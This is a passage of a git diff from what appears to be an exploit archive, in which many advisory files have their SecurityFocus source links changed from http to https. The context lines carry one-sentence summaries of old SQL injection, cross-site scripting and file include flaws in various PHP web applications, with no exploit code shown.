SQL query. diff --git a/exploits/php/webapps/26725.txt b/exploits/php/webapps/26725.txt index 239455085..650229d64 100644 --- a/exploits/php/webapps/26725.txt +++ b/exploits/php/webapps/26725.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15715/info +source: https://www.securityfocus.com/bid/15715/info eDating Professional is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26726.txt b/exploits/php/webapps/26726.txt index 8f7bf7581..ef27f7534 100644 --- a/exploits/php/webapps/26726.txt +++ b/exploits/php/webapps/26726.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15715/info +source: https://www.securityfocus.com/bid/15715/info eDating Professional is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26727.txt b/exploits/php/webapps/26727.txt index 83fc2725a..4ed12ea4e 100644 --- a/exploits/php/webapps/26727.txt +++ b/exploits/php/webapps/26727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15715/info +source: https://www.securityfocus.com/bid/15715/info eDating Professional is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26728.txt b/exploits/php/webapps/26728.txt index cde61597d..70c77672e 100644 --- a/exploits/php/webapps/26728.txt +++ b/exploits/php/webapps/26728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15716/info +source: https://www.securityfocus.com/bid/15716/info Portal Solutions is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26729.txt b/exploits/php/webapps/26729.txt index 87a27cea8..d77f03ae8 100644 --- a/exploits/php/webapps/26729.txt +++ b/exploits/php/webapps/26729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15717/info +source: https://www.securityfocus.com/bid/15717/info Affiliate Manager PRO is prone to an SQL injection vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26730.txt b/exploits/php/webapps/26730.txt index 9b63e1bfe..af93f0db5 100644 --- a/exploits/php/webapps/26730.txt +++ b/exploits/php/webapps/26730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15718/info +source: https://www.securityfocus.com/bid/15718/info Portal Solutions is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26731.txt b/exploits/php/webapps/26731.txt index 7509eaaa5..5d7af63e0 100644 --- a/exploits/php/webapps/26731.txt +++ b/exploits/php/webapps/26731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15719/info +source: https://www.securityfocus.com/bid/15719/info Blog System is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26732.txt b/exploits/php/webapps/26732.txt index 4a79fa0f6..2f33559fc 100644 --- a/exploits/php/webapps/26732.txt +++ b/exploits/php/webapps/26732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15720/info +source: https://www.securityfocus.com/bid/15720/info Trac is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26748.txt b/exploits/php/webapps/26748.txt index acd53de9b..2c32a7ebb 100644 --- a/exploits/php/webapps/26748.txt +++ b/exploits/php/webapps/26748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15742/info +source: https://www.securityfocus.com/bid/15742/info DoceboLMS is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26750.txt b/exploits/php/webapps/26750.txt index 553468bcf..694b38cf7 100644 --- a/exploits/php/webapps/26750.txt +++ b/exploits/php/webapps/26750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15746/info +source: https://www.securityfocus.com/bid/15746/info PluggedOut Blog is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26751.txt b/exploits/php/webapps/26751.txt index 492c16dcd..f1374a2a1 100644 --- a/exploits/php/webapps/26751.txt +++ b/exploits/php/webapps/26751.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15747/info +source: https://www.securityfocus.com/bid/15747/info Cars Portal is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26755.txt b/exploits/php/webapps/26755.txt index 235fa5f3a..73b32ba6a 100644 --- a/exploits/php/webapps/26755.txt +++ b/exploits/php/webapps/26755.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15763/info +source: https://www.securityfocus.com/bid/15763/info ThWboard is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26756.txt b/exploits/php/webapps/26756.txt index 39be3523c..afb2bf766 100644 --- a/exploits/php/webapps/26756.txt +++ b/exploits/php/webapps/26756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15763/info +source: https://www.securityfocus.com/bid/15763/info ThWboard is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26757.txt b/exploits/php/webapps/26757.txt index 4b646e128..56305d114 100644 --- a/exploits/php/webapps/26757.txt +++ b/exploits/php/webapps/26757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15763/info +source: https://www.securityfocus.com/bid/15763/info ThWboard is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26758.txt b/exploits/php/webapps/26758.txt index 4552aee62..7c4ab300b 100644 --- a/exploits/php/webapps/26758.txt +++ b/exploits/php/webapps/26758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15766/info +source: https://www.securityfocus.com/bid/15766/info DRZES HMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26770.txt b/exploits/php/webapps/26770.txt index 917cfdd76..39a216270 100644 --- a/exploits/php/webapps/26770.txt +++ b/exploits/php/webapps/26770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15792/info +source: https://www.securityfocus.com/bid/15792/info MilliScripts is prone to a cross-site scripting vulnerability. This is due to a lack of proper input validation. diff --git a/exploits/php/webapps/26780.txt b/exploits/php/webapps/26780.txt index cbc7bb2c5..e1765ff9d 100644 --- a/exploits/php/webapps/26780.txt +++ b/exploits/php/webapps/26780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15818/info +source: https://www.securityfocus.com/bid/15818/info Scout Portal Toolkit is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26781.txt b/exploits/php/webapps/26781.txt index 498aa725b..9d0ed252b 100644 --- a/exploits/php/webapps/26781.txt +++ b/exploits/php/webapps/26781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15818/info +source: https://www.securityfocus.com/bid/15818/info Scout Portal Toolkit is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26782.txt b/exploits/php/webapps/26782.txt index 47593db0b..69d7fe6b0 100644 --- a/exploits/php/webapps/26782.txt +++ b/exploits/php/webapps/26782.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15818/info +source: https://www.securityfocus.com/bid/15818/info Scout Portal Toolkit is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26783.txt b/exploits/php/webapps/26783.txt index b268ff949..c1e30c55a 100644 --- a/exploits/php/webapps/26783.txt +++ b/exploits/php/webapps/26783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15818/info +source: https://www.securityfocus.com/bid/15818/info Scout Portal Toolkit is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26784.txt b/exploits/php/webapps/26784.txt index 4c1067028..e09010cd8 100644 --- a/exploits/php/webapps/26784.txt +++ b/exploits/php/webapps/26784.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15819/info +source: https://www.securityfocus.com/bid/15819/info BTGrup Admin WebController is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26785.txt b/exploits/php/webapps/26785.txt index 442dcb7de..7c7096b29 100644 --- a/exploits/php/webapps/26785.txt +++ b/exploits/php/webapps/26785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15820/info +source: https://www.securityfocus.com/bid/15820/info Arab Portal is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26787.txt b/exploits/php/webapps/26787.txt index b35e56083..434157195 100644 --- a/exploits/php/webapps/26787.txt +++ b/exploits/php/webapps/26787.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15831/info +source: https://www.securityfocus.com/bid/15831/info PhpCOIN is prone to a file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26788.txt b/exploits/php/webapps/26788.txt index f7747f7aa..18c37098d 100644 --- a/exploits/php/webapps/26788.txt +++ b/exploits/php/webapps/26788.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15831/info +source: https://www.securityfocus.com/bid/15831/info PhpCOIN is prone to a file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26789.txt b/exploits/php/webapps/26789.txt index cb6457bf5..55a7bc0b5 100644 --- a/exploits/php/webapps/26789.txt +++ b/exploits/php/webapps/26789.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15836/info +source: https://www.securityfocus.com/bid/15836/info EncapsGallery is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26790.txt b/exploits/php/webapps/26790.txt index b7cb6c71f..ec9a405ae 100644 --- a/exploits/php/webapps/26790.txt +++ b/exploits/php/webapps/26790.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15837/info +source: https://www.securityfocus.com/bid/15837/info PhpWebGallery is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26791.txt b/exploits/php/webapps/26791.txt index b2e404af3..1b6510c0b 100644 --- a/exploits/php/webapps/26791.txt +++ b/exploits/php/webapps/26791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15837/info +source: https://www.securityfocus.com/bid/15837/info PhpWebGallery is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26792.txt b/exploits/php/webapps/26792.txt index 991ccf2d4..40663e724 100644 --- a/exploits/php/webapps/26792.txt +++ b/exploits/php/webapps/26792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15837/info +source: https://www.securityfocus.com/bid/15837/info PhpWebGallery is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26793.txt b/exploits/php/webapps/26793.txt index 46c93224b..901862049 100644 --- a/exploits/php/webapps/26793.txt +++ b/exploits/php/webapps/26793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15839/info +source: https://www.securityfocus.com/bid/15839/info Plogger is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26794.txt b/exploits/php/webapps/26794.txt index 7d710bdd2..6224d57e2 100644 --- a/exploits/php/webapps/26794.txt +++ b/exploits/php/webapps/26794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15839/info +source: https://www.securityfocus.com/bid/15839/info Plogger is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26795.txt b/exploits/php/webapps/26795.txt index 08072b668..e4db51916 100644 --- a/exploits/php/webapps/26795.txt +++ b/exploits/php/webapps/26795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15840/info +source: https://www.securityfocus.com/bid/15840/info VCD-db is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26796.txt b/exploits/php/webapps/26796.txt index 877da7662..00a744314 100644 --- a/exploits/php/webapps/26796.txt +++ b/exploits/php/webapps/26796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15840/info +source: https://www.securityfocus.com/bid/15840/info VCD-db is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26798.txt b/exploits/php/webapps/26798.txt index 07f8df624..66c9c8dc0 100644 --- a/exploits/php/webapps/26798.txt +++ b/exploits/php/webapps/26798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15842/info +source: https://www.securityfocus.com/bid/15842/info Mantis is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26799.txt b/exploits/php/webapps/26799.txt index fed238fc0..302b8a0fe 100644 --- a/exploits/php/webapps/26799.txt +++ b/exploits/php/webapps/26799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15844/info +source: https://www.securityfocus.com/bid/15844/info Snipe Gallery is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26800.txt b/exploits/php/webapps/26800.txt index abfcf2d36..756284f1c 100644 --- a/exploits/php/webapps/26800.txt +++ b/exploits/php/webapps/26800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15844/info +source: https://www.securityfocus.com/bid/15844/info Snipe Gallery is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26801.txt b/exploits/php/webapps/26801.txt index 935400c34..cd6000666 100644 --- a/exploits/php/webapps/26801.txt +++ b/exploits/php/webapps/26801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15844/info +source: https://www.securityfocus.com/bid/15844/info Snipe Gallery is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26808.txt b/exploits/php/webapps/26808.txt index 1072eec9e..d35f7926e 100644 --- a/exploits/php/webapps/26808.txt +++ b/exploits/php/webapps/26808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15845/info +source: https://www.securityfocus.com/bid/15845/info mcGallery PRO is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26809.txt b/exploits/php/webapps/26809.txt index f99079572..67265faa0 100644 --- a/exploits/php/webapps/26809.txt +++ b/exploits/php/webapps/26809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15845/info +source: https://www.securityfocus.com/bid/15845/info mcGallery PRO is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26810.txt b/exploits/php/webapps/26810.txt index dec1eac56..10e0b877d 100644 --- a/exploits/php/webapps/26810.txt +++ b/exploits/php/webapps/26810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15845/info +source: https://www.securityfocus.com/bid/15845/info mcGallery PRO is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26812.txt b/exploits/php/webapps/26812.txt index 1583e1e35..37a6af7d6 100644 --- a/exploits/php/webapps/26812.txt +++ b/exploits/php/webapps/26812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15847/info +source: https://www.securityfocus.com/bid/15847/info Ad Manager Pro is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26813.txt b/exploits/php/webapps/26813.txt index c8a4b6cc6..08697ad4e 100644 --- a/exploits/php/webapps/26813.txt +++ b/exploits/php/webapps/26813.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15848/info +source: https://www.securityfocus.com/bid/15848/info Job Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26814.txt b/exploits/php/webapps/26814.txt index 84807b6c0..d088e2dcb 100644 --- a/exploits/php/webapps/26814.txt +++ b/exploits/php/webapps/26814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15849/info +source: https://www.securityfocus.com/bid/15849/info Dream Poll is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26815.txt b/exploits/php/webapps/26815.txt index 5d7b0ef0e..b12ae690f 100644 --- a/exploits/php/webapps/26815.txt +++ b/exploits/php/webapps/26815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15850/info +source: https://www.securityfocus.com/bid/15850/info ProjectForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26817.txt b/exploits/php/webapps/26817.txt index f18c234e3..de4689d5b 100644 --- a/exploits/php/webapps/26817.txt +++ b/exploits/php/webapps/26817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15855/info +source: https://www.securityfocus.com/bid/15855/info PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks. diff --git a/exploits/php/webapps/26818.txt b/exploits/php/webapps/26818.txt index aac6a6d40..fe7795dad 100644 --- a/exploits/php/webapps/26818.txt +++ b/exploits/php/webapps/26818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15857/info +source: https://www.securityfocus.com/bid/15857/info Envolution is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26819.txt b/exploits/php/webapps/26819.txt index 8bf9536ee..b736fbedf 100644 --- a/exploits/php/webapps/26819.txt +++ b/exploits/php/webapps/26819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15857/info +source: https://www.securityfocus.com/bid/15857/info Envolution is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26824.txt b/exploits/php/webapps/26824.txt index cef049b48..659a25a2a 100644 --- a/exploits/php/webapps/26824.txt +++ b/exploits/php/webapps/26824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15860/info +source: https://www.securityfocus.com/bid/15860/info WikkaWiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26826.txt b/exploits/php/webapps/26826.txt index 74d3a7dcd..fa79e36be 100644 --- a/exploits/php/webapps/26826.txt +++ b/exploits/php/webapps/26826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15862/info +source: https://www.securityfocus.com/bid/15862/info Netref is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26827.txt b/exploits/php/webapps/26827.txt index 5c77df6c7..432674670 100644 --- a/exploits/php/webapps/26827.txt +++ b/exploits/php/webapps/26827.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26828.txt b/exploits/php/webapps/26828.txt index f648feecd..0c15c4829 100644 --- a/exploits/php/webapps/26828.txt +++ b/exploits/php/webapps/26828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26829.txt b/exploits/php/webapps/26829.txt index bee466625..d9381baf4 100644 --- a/exploits/php/webapps/26829.txt +++ b/exploits/php/webapps/26829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26830.txt b/exploits/php/webapps/26830.txt index 5b3ccae2a..d1edd319d 100644 --- a/exploits/php/webapps/26830.txt +++ b/exploits/php/webapps/26830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26831.txt b/exploits/php/webapps/26831.txt index 4c9ec01d7..ad2cd669c 100644 --- a/exploits/php/webapps/26831.txt +++ b/exploits/php/webapps/26831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26832.txt b/exploits/php/webapps/26832.txt index 78f8a0775..761242a4b 100644 --- a/exploits/php/webapps/26832.txt +++ b/exploits/php/webapps/26832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26836.txt b/exploits/php/webapps/26836.txt index 92f9fc196..4deb049ff 100644 --- a/exploits/php/webapps/26836.txt +++ b/exploits/php/webapps/26836.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15871/info +source: https://www.securityfocus.com/bid/15871/info Limbo CMS is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out cross-site scripting, SQL injection, and local file include attacks. diff --git a/exploits/php/webapps/26837.txt b/exploits/php/webapps/26837.txt index e58b479a7..5d5943abe 100644 --- a/exploits/php/webapps/26837.txt +++ b/exploits/php/webapps/26837.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15871/info +source: https://www.securityfocus.com/bid/15871/info Limbo CMS is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out cross-site scripting, SQL injection, and local file include attacks. diff --git a/exploits/php/webapps/26838.txt b/exploits/php/webapps/26838.txt index 1489a68f3..3bd76bbdf 100644 --- a/exploits/php/webapps/26838.txt +++ b/exploits/php/webapps/26838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15875/info +source: https://www.securityfocus.com/bid/15875/info E-commerce is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26839.txt b/exploits/php/webapps/26839.txt index 03094bbcc..c3c239ec2 100644 --- a/exploits/php/webapps/26839.txt +++ b/exploits/php/webapps/26839.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15876/info +source: https://www.securityfocus.com/bid/15876/info TML CMS is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26840.txt b/exploits/php/webapps/26840.txt index 6252c1a88..26cf6d6cb 100644 --- a/exploits/php/webapps/26840.txt +++ b/exploits/php/webapps/26840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15876/info +source: https://www.securityfocus.com/bid/15876/info TML CMS is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26841.txt b/exploits/php/webapps/26841.txt index 319d98140..71039266f 100644 --- a/exploits/php/webapps/26841.txt +++ b/exploits/php/webapps/26841.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15877/info +source: https://www.securityfocus.com/bid/15877/info E-commerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26844.txt b/exploits/php/webapps/26844.txt index c6335e05b..a91971ff9 100644 --- a/exploits/php/webapps/26844.txt +++ b/exploits/php/webapps/26844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15885/info +source: https://www.securityfocus.com/bid/15885/info DCForum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26853.txt b/exploits/php/webapps/26853.txt index 31117cf23..01bd32fc6 100644 --- a/exploits/php/webapps/26853.txt +++ b/exploits/php/webapps/26853.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15908/info +source: https://www.securityfocus.com/bid/15908/info ezDatabase is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26854.txt b/exploits/php/webapps/26854.txt index 9eb970fe8..593b6fbc2 100644 --- a/exploits/php/webapps/26854.txt +++ b/exploits/php/webapps/26854.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15908/info +source: https://www.securityfocus.com/bid/15908/info ezDatabase is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26855.txt b/exploits/php/webapps/26855.txt index f9b045cb7..1c04eaaf7 100644 --- a/exploits/php/webapps/26855.txt +++ b/exploits/php/webapps/26855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15910/info +source: https://www.securityfocus.com/bid/15910/info iHTML Merchant Mall is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26856.txt b/exploits/php/webapps/26856.txt index a36a63f69..b801f95d1 100644 --- a/exploits/php/webapps/26856.txt +++ b/exploits/php/webapps/26856.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15911/info +source: https://www.securityfocus.com/bid/15911/info iHTML Merchant is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26857.txt b/exploits/php/webapps/26857.txt index d5cc6630a..44672482c 100644 --- a/exploits/php/webapps/26857.txt +++ b/exploits/php/webapps/26857.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15912/info +source: https://www.securityfocus.com/bid/15912/info PAFileDB Extreme Edition is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26866.txt b/exploits/php/webapps/26866.txt index 9ec279d8a..68c6e5928 100644 --- a/exploits/php/webapps/26866.txt +++ b/exploits/php/webapps/26866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15920/info +source: https://www.securityfocus.com/bid/15920/info Round Cube will reportedly reveal its installation path in an error message output to the client. The filesystem layout can be sensitive information that is useful in other attacks against the target server. The trigger for this behavior is not clear; it may occur whenever a script fails and may be dependent on web-server or script configuration settings. diff --git a/exploits/php/webapps/26867.txt b/exploits/php/webapps/26867.txt index 7fa442f0e..b6f3c1f35 100644 --- a/exploits/php/webapps/26867.txt +++ b/exploits/php/webapps/26867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15924/info +source: https://www.securityfocus.com/bid/15924/info PHP Fusebox is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26868.txt b/exploits/php/webapps/26868.txt index 5e15ba707..9c5f8dc39 100644 --- a/exploits/php/webapps/26868.txt +++ b/exploits/php/webapps/26868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15925/info +source: https://www.securityfocus.com/bid/15925/info JPortal Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26870.txt b/exploits/php/webapps/26870.txt index 5d97a1f25..f23c84cdb 100644 --- a/exploits/php/webapps/26870.txt +++ b/exploits/php/webapps/26870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15927/info +source: https://www.securityfocus.com/bid/15927/info Advanced Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26871.txt b/exploits/php/webapps/26871.txt index b9a5c9688..b0b36854d 100644 --- a/exploits/php/webapps/26871.txt +++ b/exploits/php/webapps/26871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15928/info +source: https://www.securityfocus.com/bid/15928/info PlaySmS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26872.txt b/exploits/php/webapps/26872.txt index 5e4ee0aa5..64b4c1366 100644 --- a/exploits/php/webapps/26872.txt +++ b/exploits/php/webapps/26872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15931/info +source: https://www.securityfocus.com/bid/15931/info PHP-Fusion is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26877.txt b/exploits/php/webapps/26877.txt index 1caf86921..08f20ecbe 100644 --- a/exploits/php/webapps/26877.txt +++ b/exploits/php/webapps/26877.txt @@ 